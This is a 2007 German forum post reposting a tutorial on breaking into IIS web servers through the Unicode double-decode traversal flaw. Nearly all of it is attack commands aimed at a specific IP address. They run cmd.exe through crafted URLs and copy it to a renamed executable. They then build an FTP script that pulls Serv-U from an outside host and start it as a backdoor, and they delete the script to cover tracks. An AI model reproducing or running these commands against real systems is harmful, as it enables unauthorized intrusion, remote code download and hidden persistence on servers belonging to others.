[Hacking] Another IIS Hacking Tut

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Dr.Ogen, 25. August 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 25. August 2007
    Another IIS Hacking Tut

    Nabend,
    das Tutorial stammt nicht von mir ;)
    Habe nen paar Threads bzgl IIS gesehen und dachte mir joooo das postet du mal ;)

    Viel Spass

    Code:
    Also erstmal um den befehl an sich zu verstehn, z.b.:
    
    h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
    
    der befehl besteht aus 2 teilen. 
    
    teil 1: h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/ <--- das ist der unicode (das ? heißt das er über die datei "cmd.exe" ausgeführt werden soll)
    
    teil 2: c+dir+c:\ <--- das ist der teil in dem du dem server sagst was er machen soll c = der befehl soll sofort ausgeführt werden
    dir+c:\ = der normale DOS befehl
    + = platzhalter (also anstelle von leertaste)
    
    So, nun mal alle befehle mit erklärung hintereinander:
    
    h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\r00t.exe
    
    bei diesem befehl erstellst du dir dein eigenen unicode, den du dann im späteren verlauf benutzt. Das is nötig da man meißt keine rechte hat auser im ordner C:\inetpub\scripts (zu 90%) und in dem ordner der im unicode ganz vorne steht.
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+mkdir+c:\Recycler\
    
    mit dem befehl erstellst du das verzeichniss c:\recycler (eigentlich klar^^)
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+open+84.235.152.291+21>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+user>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+pw>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+BINARY>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+get+serv-u.exe>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+get+serv-u.ini>>C:\Recycler\ftp.vbl
    h**p://218.29.50.94/scripts/r00t.exe?/c+echo+quit>>C:\Recycler\ftp.vbl
    
    mit den befehlen erstellst du das ftp script (kennst du bestimmt von mssql, fals du das schon mal gehaxxt hast)
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+ftp+-s:C:\Recycler\ftp.vbl
    
    mit dem befehl startest du das ftp script
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+move+C:\inetpub\scripts\serv-u.exe+c:\Recycler\
    h**p://218.29.50.94/scripts/r00t.exe?/c+move+C:\inetpub\scripts\serv-u.ini+c:\Recycler\
    mit den befehlen bewegst du deine servu.ini u. exe in den ordner c.\recycler
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+del+C:\Recycler\ftp.vbl
    
    mit dem befehl löscht du das ftp script (spurenbeseitigung)
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+dir+c:\Recycler\
    
    mit dem befehl kannst du kontrollieren ob deine servu datein am richtigen ort sind
    
    
    h**p://218.29.50.94/scripts/r00t.exe?/c+call+c:\Recycler\serv-u.exe
    
    und mit dem befehl startest du deine servu. der server sollte im bestfall jetzt gehaxxt sein^^ und du solltest mit servu und flashfxp connecten können.
    
    
    securen tust du den server indem du die exe datei am ende des unicodes suchst und löschst^^. geht bei der cmd.exe nicht immer, da man meist im ordner c:\winnt\system32\ keine rechte hat. ien anderer weg wäre user zu dumpen (ka wie das geht).
    
    wenn ihr mal net wisst was schon alles in der ftp.vbl steht, könnt ihr wuch die datei mit dem befehl "type" anzeigen lassen.
    
    Für Fragen oder Ähnliches stehe ich nicht zur verfügung ;)

    Greets Ogen
     

  2. Anzeige

  3. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Hacking Another IIS
  1. Biohacking und Paleo?

    Nixname , 3. Februar 2014 , im Forum: Sport und Fitness
    Antworten:
    3
    Aufrufe:
    1.023
  2. Hacking & Cracking Communitys

    AScomm44 , 29. Oktober 2013 , im Forum: Szene News
    Antworten:
    4
    Aufrufe:
    4.311
  3. Antworten:
    9
    Aufrufe:
    1.484
  4. Antworten:
    0
    Aufrufe:
    671
  5. Antworten:
    17
    Aufrufe:
    962